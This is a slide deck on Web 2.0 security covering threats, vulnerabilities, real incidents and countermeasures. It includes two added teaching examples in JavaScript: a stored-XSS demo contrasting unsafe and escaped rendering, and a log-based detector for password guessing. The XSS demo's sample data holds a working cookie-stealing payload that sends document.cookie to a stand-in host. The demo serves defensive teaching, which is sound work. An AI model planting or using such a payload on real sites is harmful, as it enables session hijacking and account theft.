[Slide 1]
Security on Web 2.0
Krasznay Csaba
[Slide 2]
Google Search Trends
[Slide 3]
Press Trends
[Slide 4]
Media Image of Web 2.0
malware
deface
data breach
gossip
phishing
death
lynching
anti-privacy
child porn
data retention
[Slide 5]
What really is Web 2.0?
[Slide 6]
Risk Assessment
Threats exploit Vulnerabilities, which cause Incidents, which damage Assets, which have Impacts on the Owner.
[Slide 7]
Web 2.0 threats
• Hacker attack
• Malware infection
• Data loss
• No traces
• Copyright violation
• Software errors
• Data leaks
• Infection and downtime
• Legal prosecution
• Productivity loss
• Resource waste
• Reputation damage
• Botnets
• Financial losses
• Identity theft
• Harassment
• Age verification threats
• Spam
• Hiding of origin
• Resource consumption
• Information fraud
• Inaccuracies of data
[Slide 8]
Web 2.0 vulnerabilities
• Injection Attacks
• Cross-Site scripting
• Cross-Domain Attacks
• Malicious scripts
• Framework vulnerabilities
• Access, Authentication, Authorisation
• Development Process Issues
• Knowledge and Information Management vulnerabilities
• End-user Related problems
• General Software and Scripting Vulnerabilities
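The injection and cross-site scripting items above are the classic Web 2.0 bug: content typed by one user is rendered into the page of every other user. The following is an added example, not code from the presentation or from any product it mentions; the comment-feed shape, the helper names and mallory's payload are constructed for the demo. It shows the vulnerable rendering next to the hardened one and runs under Node without a browser.

```javascript
// Added example (not from the presentation): stored XSS in a Web 2.0 comment feed,
// the vulnerable rendering next to the hardened one. Runs under Node, no browser needed.

// Constructed sample feed, in the shape a JSON comment API might return it (hypothetical).
const sampleFeed = [
  { user: 'alice', text: 'Nice post!' },
  { user: 'mallory',
    text: '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">' },
  { user: 'bob', text: 'Is 1 < 2 && "quotes" fine?' },
];

// Escape the five characters that let text break out of an HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: user-controlled fields are concatenated straight into markup, so
// mallory's comment becomes a live <img onerror> handler in every reader's browser.
function renderFeedUnsafe(feed) {
  return feed.map((c) => `<li><b>${c.user}</b>: ${c.text}</li>`).join('');
}

// Hardened: every untrusted field is escaped before it touches markup, so the same
// payload is displayed as text. (In a browser, assigning textContent instead of
// innerHTML achieves the same; most templating frameworks auto-escape for this reason.)
function renderFeedSafe(feed) {
  return feed
    .map((c) => `<li><b>${escapeHtml(c.user)}</b>: ${escapeHtml(c.text)}</li>`)
    .join('');
}

// Crude check used by the demo only: does the rendered HTML contain a tag with an
// inline event handler, or a script tag? Enough to show the difference between the
// two renderings; not a substitute for escaping.
function containsActiveContent(html) {
  return /<[a-z][^>]*\bon[a-z]+\s*=|<script\b/i.test(html);
}

// Stand-alone run: shows which rendering is exploitable.
for (const [name, render] of [['unsafe', renderFeedUnsafe], ['safe', renderFeedSafe]]) {
  const html = render(sampleFeed);
  console.log(`${name}: active content = ${containsActiveContent(html)}`);
  console.log(html);
}
```

Bob's comment is why output encoding rather than input filtering is the right control: his text contains `<`, `&` and quotes that are legitimate and must survive; escaping at render time keeps them readable while turning mallory's tag into inert text. The "framework vulnerabilities" item on the slide is the flip side: a framework that auto-escapes only helps if no template opts out of it for untrusted data.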
[Slide 9]
Target: the Person
• Think about cyber-bullying and cyber-stalking
• Threats: Identity theft, Harassment, Age verification threats
• Vulnerabilities: Access, Authentication, Authorization; End-user Related problems
• Incident: the story of Megan Meier, and think about what happened with Lori Drew…
• Asset: Private information, personal reputation, Physical security
• Impact: lethal…
[Slide 10]
Target: the Company
• Think about the Twitter account hacks
• Threats: Identity theft, Harassment, Spam, Information fraud
• Vulnerabilities: Access, Authentication, Authorization; Knowledge and Information Management vulnerabilities
• Incident: celebrity Twitter hacks
• Asset: Corporate and personal reputation, Corporate secrets
• Impact: high
[Slide 11]
Target: the Country
• Think about WikiLeaks
• Threat: Data leak
• Vulnerabilities: Access, Authentication, Authorisation; Development Process Issues; Knowledge and Information Management vulnerabilities; End-user Related problems; General Software and Scripting Vulnerabilities
• Incident: Afghan War Diary
• Impact: high (maybe lethal?)
[Slide 12]
Target: the Computer
• Think about the Web 2.0 worms
• Threats: Botnets, Financial losses, Identity theft, Spam, Hiding of origin, Resource consumption
• Vulnerabilities: Access, Authentication, Authorisation; Development Process Issues; End-user Related problems; General Software and Scripting Vulnerabilities
• Incident: the KOOBFACE worm
• Impact: high
[Slide 13]
Conclusions
• Nothing has changed in our behaviour for centuries, but we have new tools and a broader audience
• Web 2.0 services are generally more secure in the traditional technical sense than other types of web service, but preventive controls are not enough
• We have to deal with the problem between the keyboard and the chair…
[Slide 14]
Maslow's hierarchy of needs
• Web 2.0 realizes three layers of human needs
• So people need safety and security – but maybe we haven't realized it yet
• If Web 2.0 can be lethal, do we also need the physiological layer?
[Slide 15]
Countermeasures
• Technical countermeasures:
– Preventive controls focusing on information (DLP)
– Detective controls (log management)
– Secure applications (WAF, application controls)
• Administrative countermeasures:
– New security policy approach
– New legal background
– Broad awareness training
– Communication, communication, communication
• Mathematical countermeasures:
– The more information we have, the less value each piece of it has
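The "detective controls (log management)" item is easiest to see on a concrete log. The following is an added example, not code from the presentation or from any product: it runs a small rule over constructed web-server access-log lines and flags a burst of failed logins from one address followed by a success, the pattern behind the guessed-password account takeovers the "Target: the Company" slide alludes to. The log format (Apache combined), the /login path, the 401/200 status convention and the threshold are all assumptions for the demo.

```javascript
// Added example (not from the presentation): a detective control over web-server logs
// for the "Access, Authentication, Authorisation" class of Web 2.0 vulnerability.
// Log format (Apache combined), login path, status codes and threshold are assumptions.

// Constructed sample log lines; the addresses are documentation ranges, not real traffic.
const sampleLog = `
203.0.113.7 - - [10/Aug/2010:10:00:01 +0000] "GET /login HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:02 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:03 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:04 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2010:10:00:04 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:05 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:06 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2010:10:00:07 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:08 +0000] "POST /login HTTP/1.1" 401 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2010:10:00:09 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
this line is not a log entry
`.trim();

// client_ip ident user [timestamp] "METHOD path proto" status size ...
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (?:\d+|-)/;

// Parse one access-log line into the fields the rule needs; null for anything else.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Rule: count failed POSTs to the login endpoint per source address.
//  - 'password-guessing' when an address reaches `threshold` failures
//  - 'possible-takeover' when an address with >= threshold failures then succeeds
function detectPasswordGuessing(logText, { loginPath = '/login', threshold = 5 } = {}) {
  const failures = new Map();
  const alerts = [];
  for (const raw of logText.split('\n')) {
    const e = parseLine(raw);
    if (!e || e.method !== 'POST' || e.path !== loginPath) continue;
    if (e.status === 401) {
      const n = (failures.get(e.ip) || 0) + 1;
      failures.set(e.ip, n);
      if (n === threshold) {
        alerts.push({ type: 'password-guessing', ip: e.ip, ts: e.ts, failures: n });
      }
    } else if (e.status === 200 && (failures.get(e.ip) || 0) >= threshold) {
      alerts.push({ type: 'possible-takeover', ip: e.ip, ts: e.ts, failures: failures.get(e.ip) });
    }
  }
  return alerts;
}

// Stand-alone run: one 'password-guessing' and one 'possible-takeover' alert for 203.0.113.7;
// the single mistyped password from 198.51.100.9 stays quiet.
console.log(detectPasswordGuessing(sampleLog));
```

The rule keys on source address, which is exactly what the "Hiding of origin" and "Botnets" threats on slide 7 defeat: a botnet spreads the guesses across many addresses. A production version also counts failures per target account, which needs the application's own authentication log rather than the access log, and it resets or decays the counters so one noisy day does not alert forever.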
[Slide 16]
THANK YOU!
E-mail: [email protected]
www.krasznay.hu
Facebook: http://www.facebook.com/krasznay.csaba
Twitter: http://twitter.com/csabika25